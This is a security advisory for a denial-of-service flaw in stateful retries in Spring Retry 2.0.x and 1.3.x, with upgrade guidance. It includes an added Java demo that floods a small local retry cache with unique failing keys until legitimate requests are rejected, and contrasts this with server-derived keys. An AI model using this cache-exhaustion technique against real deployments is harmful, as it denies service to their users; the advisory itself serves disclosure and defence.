Spring Retry
- >= 2.0.0, <= 2.0.12
- >= 1.3.0, <= 1.3.4
A denial-of-service vulnerability has been identified in Spring Retry versions 2.0.0 through 2.0.12 and 1.3.0 through 1.3.4. It affects applications that use stateful retries (a `RetryState` key passed to `RetryTemplate.execute(...)`, or `@Retryable(stateful = true)`, whose key is derived from the method arguments by default) with keys that an attacker can choose, for example a client-supplied request or message identifier. Exploitation involves sending a large number of requests with unique keys that each fail at least once: every first failure stores a retry context in the application-wide stateful retry cache, and that entry is only removed when the retry for that key later succeeds or is exhausted, which an attacker never does. Once the cache reaches its capacity it permanently rejects further entries, so subsequent stateful retries and circuit breakers on the same cache fail.
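The following Java program is an added example, not code from the Spring Retry project or from the advisory; it reproduces the exhaustion mechanics described above against the library's own `RetryTemplate` and `MapRetryContextCache`, and shows why a server-derived key does not have the same problem. The cache capacity of 4, the request ids, the principal name and the `ALWAYS_FAILS` callback are constructed for the demo; the library default capacity is much larger. Keying by an authenticated principal only illustrates the precondition (attacker-controlled keys) and is not a substitute for upgrading.

```java
import org.springframework.retry.RetryCallback;
import org.springframework.retry.policy.MapRetryContextCache;
import org.springframework.retry.policy.RetryCacheCapacityExceededException;
import org.springframework.retry.policy.SimpleRetryPolicy;
import org.springframework.retry.support.DefaultRetryState;
import org.springframework.retry.support.RetryTemplate;

/**
 * Shows how attacker-controlled stateful retry keys fill the shared
 * RetryContextCache, and how a server-derived key keeps the number of
 * live entries bounded. Demo code, not part of Spring Retry.
 */
public class StatefulRetryCacheDemo {

    /** Hypothetical demo capacity, far smaller than the library default, so exhaustion shows up quickly. */
    static final int CACHE_CAPACITY = 4;

    static RetryTemplate newTemplate() {
        RetryTemplate template = new RetryTemplate();
        template.setRetryPolicy(new SimpleRetryPolicy(3));
        template.setRetryContextCache(new MapRetryContextCache(CACHE_CAPACITY));
        return template;
    }

    /** Stand-in for the retried operation: it fails on every call. */
    static final RetryCallback<Void, Exception> ALWAYS_FAILS = ctx -> {
        throw new IllegalStateException("downstream unavailable");
    };

    /** Vulnerable pattern: the retry key is whatever the client put in the request. */
    static void handleWithClientKey(RetryTemplate template, String clientSuppliedId) throws Exception {
        template.execute(ALWAYS_FAILS, ctx -> null, new DefaultRetryState(clientSuppliedId));
    }

    /** Safer pattern: the key comes from the authenticated principal and the operation name,
     *  so the number of distinct keys is bounded by the number of legitimate users. */
    static void handleWithServerKey(RetryTemplate template, String principal, String operation) throws Exception {
        template.execute(ALWAYS_FAILS, ctx -> null, new DefaultRetryState(principal + ":" + operation));
    }

    /** The capacity error is reported through the cause chain of what execute() throws. */
    static boolean causedByCacheExhaustion(Throwable t) {
        for (Throwable c = t; c != null; c = c.getCause()) {
            if (c instanceof RetryCacheCapacityExceededException) {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) throws Exception {
        RetryTemplate template = newTemplate();

        // Attack: every request carries a fresh id and fails exactly once. The first failure
        // parks a RetryContext under that key and nothing ever retries or exhausts it.
        int parked = 0;
        for (int i = 0; ; i++) {
            try {
                handleWithClientKey(template, "req-" + i);
            } catch (Exception e) {
                if (causedByCacheExhaustion(e)) {
                    System.out.println("cache full after " + parked + " unique failing requests");
                    break;
                }
                parked++; // stateful retry rethrows to the caller, but the slot stays occupied
            }
        }

        // Collateral damage: any other stateful retry on the same cache now fails immediately.
        try {
            handleWithClientKey(template, "legit-order-42");
        } catch (Exception e) {
            System.out.println("legitimate request rejected by full cache: " + causedByCacheExhaustion(e));
        }

        // Contrast: a key that is retried until the policy is exhausted reaches the recovery
        // callback and is removed from the cache, which is why honest clients do not leak slots.
        RetryTemplate fresh = newTemplate();
        for (int call = 1; call <= 5; call++) {
            try {
                handleWithClientKey(fresh, "same-id");
                System.out.println("recovery callback ran on call " + call + "; slot released");
                break;
            } catch (Exception ignored) {
                // attempts consumed; keep going until the policy is exhausted
            }
        }

        // Server-derived key: a flood from one principal cycles through one slot instead of filling the cache.
        for (int i = 0; i < 100; i++) {
            try {
                handleWithServerKey(fresh, "alice", "placeOrder");
            } catch (Exception e) {
                if (causedByCacheExhaustion(e)) {
                    throw new AssertionError("server-derived key must not exhaust the cache");
                }
            }
        }
        System.out.println("100 failing calls under a server-derived key did not exhaust the cache");
    }
}
```

Run it with `spring-retry` on the classpath; the first loop stops as soon as `RetryCacheCapacityExceededException` appears in the cause chain, which is the signal to look for in logs when triaging an affected deployment. To audit your own code, find every `RetryState` construction and every `@Retryable(stateful = true)` and ask whether the key (or, for the annotation, any method argument) can be chosen by an unauthenticated or unbounded set of callers.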
Exploitation results in a denial-of-service condition: the application can no longer complete stateful retries or circuit-breaker-protected calls that share the exhausted cache, disrupting its normal operation. With the default in-memory cache the condition persists until the application is restarted.
Users of Spring Retry 2.0.x should upgrade to version 2.0.13, or to 2.0.12.1 (Enterprise Support only). Users of Spring Retry 1.3.x should upgrade to version 1.3.5 (Enterprise Support only).